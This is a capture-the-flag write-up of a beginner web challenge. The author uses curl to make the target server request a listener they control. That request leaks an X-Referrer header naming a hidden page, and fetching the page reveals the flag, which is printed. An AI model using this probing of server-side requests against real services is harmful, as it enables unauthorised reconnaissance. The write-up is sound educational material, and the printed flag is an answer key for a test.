H4x0r, tired of his hacking attempts is hosting a simple contest to rate the images of every user. Head on here to take part in the contest and impress him. http://backdoor.cognizance.org.in/problems/web100-1/submit.php
This challenge involved a pretty straight-forward web service which leaked referrer information. Here's the landing page:
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php'
<html><head> <title>Upload Image</title> </head> <body> <h3>Give the link for your profile picture</h3> <form action="./submit.php" method="POST"> <input name="url" placeholder="Enter link" type="url"><br> <input value="Submit" type="submit"> </form> </body></html>
Working along the problem, our first couple POSTs show the application doesn't really care about images...
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php' --data 'url="'
The link is invalid. Click <a href='./submit.php'>here</a> to go back and try again.
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php' --data 'url=http://www.google.com'
Your profile picture has been given 28 points out of 100. Click <a href='./submit.php'>here</a> to go back and try again.
Next step, view an actual request
$ curl 'http://backdoor.cognizance.org.in/problems/web100-1/submit.php' --data 'url=http://ctf.shysecurity.com:8000'
Connection from 128.199.215.224 port 8000 [tcp/*] accepted GET / HTTP/1.1 Host: ctf.shysecurity.com:8000 Accept: */* X-Referrer: 92702a9381515494689f5d14f85a83b7.php
That X-Referrer is interesting... I wonder if we can GET it?
curl 'http://backdoor.cognizance.org.in/problems/web100-1/92702a9381515494689f5d14f85a83b7.php'
<html> <head> <title>Super Secret Page</title> </head> <body> <h2>Super secret page</h2> <p>This is a dangerous place. You shouldn't be lurking here. Click <a href="./submit.php">here</a> to go back.</p> <!-- By the way, the flag is f556b9a48a3ee914f291f9b98645cb02 --> </body>
Flag: f556b9a48a3ee914f291f9b98645cb02